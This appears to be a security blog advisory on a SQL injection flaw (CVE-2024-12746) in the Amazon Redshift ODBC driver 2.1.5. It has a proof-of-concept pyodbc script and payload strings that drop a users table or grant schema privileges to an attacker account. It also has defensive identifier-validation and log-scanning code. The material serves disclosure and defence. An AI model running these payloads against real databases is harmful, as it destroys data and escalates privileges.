CVE-2024-12746 - SQL Injection Attack in Amazon Redshift ODBC Driver v2.1.5 – Full Exploit Details & Guidance

In February 2024, a critical SQL injection vulnerability (CVE-2024-12746) was discovered in the Amazon Redshift ODBC Driver, specifically version 2.1.5 for both Windows and Linux. The flaw lets an attacker gain escalated privileges by abusing the SQLTables or SQLColumns metadata APIs. Fortunately, Amazon has since addressed the issue in version 2.1.6, and recommends downgrading to 2.1.4 if you cannot upgrade immediately.

In this exclusive deep-dive, we'll explain how the vulnerability works, show sample exploitation steps, and help you secure your Redshift environments.

- Product: Amazon Redshift ODBC Driver
- Vulnerable Version: 2.1.5 (Windows/Linux)

References

- Amazon Security Bulletin
- NIST NVD Entry

How Does the Exploit Work?

ODBC (Open Database Connectivity) drivers let applications interact with databases using SQL. Developers often use metadata functions like SQLTables or SQLColumns to get information about tables or columns.

Vulnerability:
In Amazon Redshift ODBC Driver 2.1.5, user-supplied input to these metadata APIs is not properly sanitized. An attacker can inject SQL through the table name or schema name arguments passed to these functions.

Example Exploitation Scenario

Let's imagine a reporting app where users can enter a table name to look up in Redshift. The back-end code might call SQLTables like this (Python with pyodbc):

```python
import pyodbc

# Dangerous: takes user input directly, with no validation
table = input("Enter table name: ")
conn = pyodbc.connect("DSN=Redshift")
cursor = conn.cursor()
# Calls the driver's SQLTables with the untrusted value
cursor.tables(table=table)
```

Malicious Input:

Suppose a malicious user enters this as the table name:

```text
dummy'; DROP TABLE users; --
```

What Happens?

With version 2.1.5 of the ODBC driver, the underlying SQL sent to Redshift would end up like:

```sql
SELECT ... FROM pg_tables WHERE tablename = 'dummy'; DROP TABLE users; --'
```

The injected command DROP TABLE users; executes, deleting the table and damaging your data.

Proof-of-Concept Exploit (Python)

The proof-of-concept below shows how an attacker might exploit the vulnerability.

```python
import pyodbc

malicious_input = "public'; GRANT ALL ON SCHEMA public TO attacker_user; --"
conn = pyodbc.connect("DSN=RedshiftVulnerable215")
cursor = conn.cursor()

try:
    # This triggers the vulnerable driver logic (SQLColumns with an unsanitized schema name)
    cursor.columns(schema=malicious_input)
    print("Exploit sent successfully.")
except Exception as e:
    print("Error during exploitation:", e)
```

What this does:
- The injected GRANT ALL ON SCHEMA public TO attacker_user; will run and grant full schema privileges to the attacker's account.

How to Check Your Driver Version

To check your ODBC driver version on Windows, open ODBC Data Source Administrator and look for "Amazon Redshift ODBC Driver":

- 2.1.4 (safe, can downgrade if unable to upgrade)
- 2.1.5 (vulnerable)
- 2.1.6 (safe, upgraded/fixed)

On Linux, run:

```shell
odbcinst -j
odbcinst -q -d -n "Amazon Redshift"
```

Upgrade

Download the latest (2.1.6) Redshift ODBC driver from the official Amazon page.

Principle of Least Privilege

Restrict Redshift account privileges so that even if SQL injection occurs, the attacker can do minimal harm: an application service account that cannot run GRANT or DROP cannot be used to grant itself privileges or destroy tables.

Monitor

Audit logs for unusual statements (GRANT, DROP, CREATE and similar) issued by regular application service accounts, which should never run such statements in normal operation.
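Two defensive checks that follow from the advice above, as an added example that is not part of the original post or of Amazon's driver: an allowlist validator for the table or schema name handed to SQLTables/SQLColumns (defence in depth, not a substitute for upgrading), and a scan of log lines in the shape of Redshift's user activity log that flags GRANT/DROP/CREATE-style statements issued by an application service account. The account name app_svc and the sample log lines are constructed for this example.

```python
import re

# Allowlist for plain Redshift-style identifiers: a letter or underscore, then
# letters, digits, underscore or dollar. The length bound is a defensive choice.
IDENTIFIER_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_$]{0,126}$")


def is_safe_identifier(name: str) -> bool:
    """True only for a bare identifier; quotes, semicolons, comment
    markers and whitespace (the injection above needs all of them) fail."""
    return bool(IDENTIFIER_RE.fullmatch(name))


# Constructed sample lines in the layout of Redshift's useractivitylog:
# 'timestamp UTC [ db=.. user=.. pid=.. userid=.. xid=.. ]' LOG: <sql>
SAMPLE_LOG = """\
'2024-12-24T17:15:08Z UTC [ db=dev user=app_svc pid=1011 userid=100 xid=5001 ]' LOG: select tablename from pg_tables where tablename = 'users';
'2024-12-24T17:15:09Z UTC [ db=dev user=app_svc pid=1011 userid=100 xid=5002 ]' LOG: GRANT ALL ON SCHEMA public TO attacker_user;
'2024-12-24T17:15:10Z UTC [ db=dev user=dba_alice pid=1020 userid=101 xid=5003 ]' LOG: grant usage on schema public to reporting;
'2024-12-24T17:15:11Z UTC [ db=dev user=app_svc pid=1011 userid=100 xid=5004 ]' LOG: drop table users;
"""

LOG_LINE_RE = re.compile(r"user=(?P<user>\S+) .*?\]' LOG: (?P<sql>.*)$")
# Statements an application service account should never issue.
PRIVILEGED_RE = re.compile(r"^\s*(GRANT|REVOKE|DROP|CREATE|ALTER)\b", re.IGNORECASE)


def find_suspicious_statements(log_text: str, service_accounts: set[str]) -> list[tuple[str, str]]:
    """Return (user, sql) pairs where a service account ran a DDL/DCL statement."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE_RE.search(line)
        if not m:
            continue  # not a statement line; skip
        user, sql = m.group("user"), m.group("sql").strip()
        if user in service_accounts and PRIVILEGED_RE.match(sql):
            hits.append((user, sql))
    return hits


if __name__ == "__main__":
    for candidate in ("users", "dummy'; DROP TABLE users; --"):
        print(f"{candidate!r}: {'accepted' if is_safe_identifier(candidate) else 'rejected'}")
    for user, sql in find_suspicious_statements(SAMPLE_LOG, {"app_svc"}):
        print(f"ALERT: service account {user} ran: {sql}")
```

Validate every table or schema name with is_safe_identifier before it reaches cursor.tables or cursor.columns; the log scan is a starting point for an alert rule, not a complete parser of every useractivitylog variant.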

- Amazon Security Bulletin for CVE-2024-12746
- NIST CVE Record
- AWS Redshift ODBC Driver Official Docs

Conclusion

CVE-2024-12746 is a real threat for any business running Amazon Redshift with the ODBC driver v2.1.5. The ease of exploitation, especially via common metadata API calls, makes it imperative to upgrade or downgrade your driver immediately. Always vet user input, apply the principle of least privilege, and keep your software up to date.

Stay safe, and patch now.

*Originally published by SecureTech Team, 2024 – For exclusive infosec insights, follow us on Twitter/X*

Timeline

Published on: 12/24/2024 17:15:08 UTC
Last modified on: 12/26/2024 15:15:06 UTC